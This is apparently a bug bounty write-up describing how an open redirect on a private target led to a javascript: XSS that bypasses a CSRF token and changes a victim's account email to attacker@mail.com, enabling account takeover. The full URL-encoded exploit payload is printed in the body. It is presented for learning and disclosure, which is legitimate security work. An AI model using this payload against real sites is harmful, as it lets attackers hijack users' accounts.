Chaining Open Redirect with XSS to Account Takeover

Hello everyone, I hope you are well. In this article I will show you how I escalated XSS to Account Takeover. Since the target is private, let’s call as target.com.

The Open Redirect

I started testing target and register the account, while register, I can create my own subdomain for the organization like ownsubdomain.target.com. Then I logged in to the dashboard. Not long after, I found the url endpoint like this https://ownsubdomain.target.com/overview/?ccpa_redirect=

URL Endpoint

Then i tried to open redirect like this https://ownsubdomain.target.com/overview/?ccpa_redirect=https://evil.com and it was successfully, i was redirected to evil.com page :D. Then I tried to use this XSS payload javascript:alert(1); and opened in the browser, and yeah the XSS popped up.

Chaining the XSS to Account Takeover

After that, I didn’t immediately report the bug. I’m thinking of upgrading this XSS to a more severe impact. Shortly, I found a form that can change my email, like this

Form Change Email

But there was an CSRF-TOKEN protection. Then I remember that I had read a writeup about Chaining the XSS to severe impact. So, I make the payload for change my email and bypassed the CSRF-TOKEN protection with XSS vulnerability. The payload was like this :

javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://ownsubdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed');

So, when I visited this URL https://ownsubdomain.target.com/overview/?ccpa_redirect=javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://subdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed'); in browser, the alert will popped up and the email will changed.

Alert Popped Up
Email Changed Successfully

Then I reported this to the program, but I got duplicate :(

I hope you are enjoyed my writeup, keep learning and stay safe.

Tips :

Don’t be quick to report any bugs you find, always look for more severe impacts.

--

--

--

Keep Silent.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

mStable Governance Updates — 21 June 2022

VPN or No VPN, That is the Question

What Starts Here Changes The World….TexasCoin $TEC

Verifiedpainpharma.com

Common Cyber Attacks: Password attack & SQL injection attack

CoinEx Exclusive Celebration Event for June,Up to one Million CET Is Waiting for You

Brave — Stealing your cookies remotely

The Black Portal: The Lawless Digital Wasteland

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Radian ID

Radian ID

Keep Silent.

More from Medium

IDOR vulnerability on invoice and weak password reset leads to account take over

Full Account takeover (ATO) — a tale of two bugs 🐛

No Rate Limiting on Forget Password Page (Email Triggering)

2FA Misconfiguration leads to adding any number as 2FA verification